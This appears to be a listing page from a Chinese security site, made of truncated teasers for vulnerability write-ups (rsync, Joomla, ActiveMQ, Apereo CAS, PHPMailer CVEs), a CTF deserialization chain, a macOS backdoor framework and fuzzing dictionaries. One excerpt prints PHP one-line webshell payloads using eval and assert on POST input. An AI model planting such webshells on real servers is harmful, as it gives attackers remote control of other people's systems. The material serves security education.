漏洞描述：rsync是Linux/Unix下的一个远程数据同步工具，可通过LAN/WAN快速同步多台主机间的文件和目录，默认运行在873端口。由于配置不当，导致任何人可未授权访问rsync，上传本地文件，下载服...

周末和cx某人打了0ctf ，继hfctf2022 ezchain 找到rome二次反序列化链之后 ，hessian到挖jdk原生链了2333. 环境 ： 只有 hessian 4.0.38 + jdk8u342 直接就是hessian 反序列化，挖jdk原生链 hes...

CVE-2015-8562 漏洞描述：本漏洞根源是PHP5.6.13前的版本在读取存储好的session时，如果反序列化出错则会跳过当前一段数据而去反序列化下一段数据。而Joomla将session存储在Mysql数据库中，编码...

关于OSRipper OSRipper是一款功能强大的macOS后门研究与加密框架，在该功能的帮助下，广大研究人员可以通过创建无法检测的后门和信息加密来研究macOS（M1芯片）的安全性。除此之外，该工具还支...

CVE-2015-5254 漏洞描述：Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞，该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMe...

0X00普通的一句话木马（适用于CTF和小站） <?php eval($_POST['a']); ?> //函数的相似替换 <?php assert($_POST['a']); ?> <?php @eval($_POST['110']);?>与第一个一句话木马...

漏洞描述：Apereo CAS是一款Apereo发布的集中认证服务平台，常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题，利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏...

互联网跟人类社会一样，都通过特定的规则和法律来确保社会的正常运行。BGP协议就是互联网中的“规则”之一。BGP用于在不同的自治系统(AS)之间交换路由信息，当两个AS需要交换路由信息时，每个AS...

项目地址：https://github.com/TheKingOfDuck/fuzzDicts content 参数Fuzz字典Xss Fuzz字典用户名字典密码字典目录字典sql-fuzz字典ssrf-fuzz字典XXE字典ctf字典Api字典路由器后台字典文件后缀F...

CVE-2016-10033漏洞描述：WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(本 ＜5,2.18)存在远程命令执行漏洞，攻击者只需巧炒地构造出一个恶意邮箱地址，即可写入任意文件，造成远程...